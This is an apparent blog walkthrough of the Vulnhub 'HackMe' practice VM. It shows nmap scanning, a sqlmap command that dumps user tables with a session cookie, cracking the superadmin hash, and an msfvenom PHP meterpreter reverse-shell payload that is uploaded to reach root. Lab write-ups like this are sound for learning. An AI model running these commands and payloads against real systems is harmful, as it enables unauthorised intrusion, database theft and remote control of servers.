HackMe is a quick little boot to root box available on Vulnhub, which was created by user x4bx54. This is another beginner level box, that offers a good intro to basic SQL injection using pre-made tools. In the future I am planning on adding another post which walks through the manual exploitation of the SQL injection in order to help me better understand it.
I used Parrot OS on bare metal for this tutorial, so if you are using Kali, some of the commands may be slightly different, and your shell prompt will most likely not match mine exactly. The HackMe machine is running in VMWare. The exploitation will be basically the same though even if your setup doesn’t match this exactly. Upon starting the HackMe Machine we are greeted with a simple login page, so the first step will be obtaining the IP Address of the local machine.
The easiest way to do this is to run nmap -sP 192.168.0.0/24
before turning on the HackMe box, and then running the same command
again after the box is turned on. Whichever IP appears the second time,
but was not there the first is the IP we will be targeting. In this case
the IP my box was assigned was 192.168.0.146 and that is what I will be
using throughout the rest of this walk through, your specific IP will
most likely be different. Also, the initial scan range is dependent on
your router and will need to be adjusted accordingly. As a last resort,
you can always log onto your routers admin page, and see which devices
are new. Note that this will only work if you are running the VM in
bridged mode.
Now that I know the IP address I am looking for, I will run a port scan on the specific box with nmap -sC -sV -oA hackme 192.168.0.146
. This will do a scan on the most common ports, using default scripts,
and enumerating versions when possible, and will output the results to a
number of files whose names start with hackme .
Press enter or click to view image in full size
From this, we can see that there are two ports open, HTTP on port 80, and ssh on port 22. I will start with the website by navigating our browser to http://192.168.0.146.
Here I am greeted with a standard login page, where I make an account using chris:password. This works and redirects me to a book search page.
Press enter or click to view image in full size
I tried a number of different books here and got no results, and for a bit was wondering if there even were any books to be viewed. Then I clicked search with no parameters at all, and was greeted with a list of books.
Press enter or click to view image in full size
From
here I decided to run sqlmap and test for any sort of SQL injection
issues the site might have. Before I could do this however there were a
few pieces of info I needed, this included any cookies that I may need
to use when accessing the site, and the exact way the search term was
sent to the server. To find the cookies. I opened developer tools in
Firefox, clicked on the storage tab, and saw that there is one cookie
called PHPSESSID with a value of rrvcd91s58ssj0t86q3eisfgnm . I noted these for later use.
Press enter or click to view image in full size
Next,
I needed to see how the data was sent. In this case I just moved to the
network tab in the developer tools, reloaded the page, clicked on the
item with the status code 200 and then clicked on the params tab within
this item to see what data had been sent. There was a key called search with no value, as I had sent previously an empty value to get all the books. I noted this as well and prepared to run sqlmap.
Get Chris Humphreys’s stories in your inbox
Join Medium for free to get updates from this writer.
The query I used was sqlmap -u http://192.168.0.146/welcome.php --data="search=1" --cookie="PHPSESSID=rrvcd91s58ssj0t86q3eisfgnm" --dump --batch . You will need to substitute your own php cookie in this command. The --dump flag tells sqlmap to dump table entries, and the --batch command tells it to choose default options and not prompt the user.
Press enter or click to view image in full size
As
you can see from the output above, I obtained all users passwords
except for superadmin. To get this I simply copied and pasted it into crackstation found that the password was Uncrackable .
Press enter or click to view image in full size
The next step was to log into this website as the superadmin. When logging in as superadmin, instead of being directed to the book search page, I was instead directed to an upload page.
Press enter or click to view image in full size
Knowing
from the URL that this server runs PHP, I decided to create PHP reverse
meterpreter shell code in msfvenom using the command msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.117 lport=443 -o shell.php
. The lhost option will need to be adjusted to your listeners IP. I
then used the form on the website to upload this to the server. With the
file uploaded I just needed to set up a listener in metasploit.
Press enter or click to view image in full size
Once the listener was up and running, I navigated to http://192.168.0.146/uploads in my browser and clicked the shell.php file. My listener immediately responded with a new connection.
After searching for a bit I found the file /home/legacy/touchmenot
. Seeing that it was executable by anyone, and with a name like that, I
immediately ran it, and as can be seen below, running this file gave me
root and completed the box.
Press enter or click to view image in full size
Overall, this was a fun little box. It really makes me want to dive more into SQL injection though, as I couldn’t get the injection to work by hand, and had to use sqlmap to get it to work. Thanks for reading, I hope you enjoyed this walkthrough.